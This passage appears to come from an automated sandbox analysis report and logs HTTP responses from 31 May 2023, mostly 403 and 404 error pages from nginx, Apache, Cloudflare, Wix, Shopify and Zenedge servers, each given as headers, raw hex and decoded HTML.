3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:16 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:16 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMepe296fMW5KF9VDXVotyUV,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=X-Wix-Request-Id: 1685537416.35136764493316733X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:16 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Cf-Railgun: direct (starting new WAN connection)Pragma: no-cacheVary: User-Agent,User-AgentX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xw%2FLq482xCB%2FEmy%2F1NTjWT2b4TyV8XbpVvfdVgH7QgtsMQiZnW1GRl7DRCY0hLPmRmMUNkvVJFuJ6ZOmuzwNGDXbWawD1qaaV8JLwYZ6YbNagsc8WyNCj%2FBStae13gSzWsQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5781ea2518de-FRAalt-svc: h3=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 Data Ascii: 4bf<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0; font-size:150px; line-height:1
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:50:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=18X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1X-Request-ID: ec00ae81-78fb-46bf-82cf-557afb46b1a9CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jJ2UNac%2FDiKKPvCgbol%2FEEXdB5CsKbQXRqDkYpiTfv0SdH8IazhBLxWvrpHkboabkR5kD3QYG%2FfqFAjmcmox9Ac8rmT9a%2FxK8CigrSlvRpx%2FRRL998yR1bKgQx%2BilDI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=137.000084Server: cloudflareCF-RAY: 7cff57895b1f3a97-FRAalt-svc: h3=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Cache-Status: Date: Wed, 31 May 2023 12:50:23 GMTServer: ZENEDGEX-Zen-Fury: 9f948333887b55517a2ff3d7c03e225b01b673c1Data Raw: 31 66 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 34 33 35 30 22 2c 20 31 36 38 35 35 33 37 34 30 34 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 1f9<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC4350", 1685537404, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:23 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jkdKBTtw6ZC7NB2%2BDXQFc3JgGcoQOvg9xkyPyazqLdR0QUf1ws7i6QXdm6kvPbOwKjwHXZSlF8Jtl9xC68LXm3Eqwabp3WCJIMC6m0f8Ka%2F2HG2o7vX1mMOG9blSPH6u"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff579f0ec218d5-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:23 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9vc0wZ785ODwxvGNVigBICBzKWH1YgvvgSVSHN7iEb%2F0GcPBpefRsf8dnY8xwZ7Krde60YCYeK8B3cxNlSoGgzU1Q0c8qJ%2Fq9BuYI5c95zdBfKu7OfQSS43jDERcgLUQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff57a0486418d5-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:27 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NeIcGQnXgNFDVa1ZR0InWDKyGGYvYC2CVCLF9KQ8%2BgLPt1qxa0HL42BhJC1VwxvsHfQy5cSdcfgLJUmRlL0C%2BLK6Yt3ZewW1CKaLIfwE%2FkO1pBGklGc2pMnDqDjQWJzR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff57b92e4e39eb-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:27 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DKe5zuvx%2FAQ6CZC2UQAPWrRUk33kcwlaRS08dRtgw1jjWzwMhyy5HFXizp1qql8Or8nmA9zJ3UMebbi4Pb22L10K5HsrXM2DXHxjnNXvlpdThBuh%2BhpuzFmiNs3c%2B8CX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff57b95e8239eb-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:27 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMd/151owQ/lnPQAbZp+OUtp,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=X-Wix-Request-Id: 1685537427.412161314961715762X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:50:27 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 31 May 2023 12:50:42 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6Yhx3Fogn%2B4tAJ6%2F388ZIIwhkJerVacuahSuFHjl0rECkKc%2FnerTiqpCb6sQI2FEt7rhuAJyQR7y5o5VxMArKqD8ReN2LtQAqPjM%2Bxhl9I6VEfsDIkqSJVlfAWSRLg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 7cff57baff1937ef-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 61 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 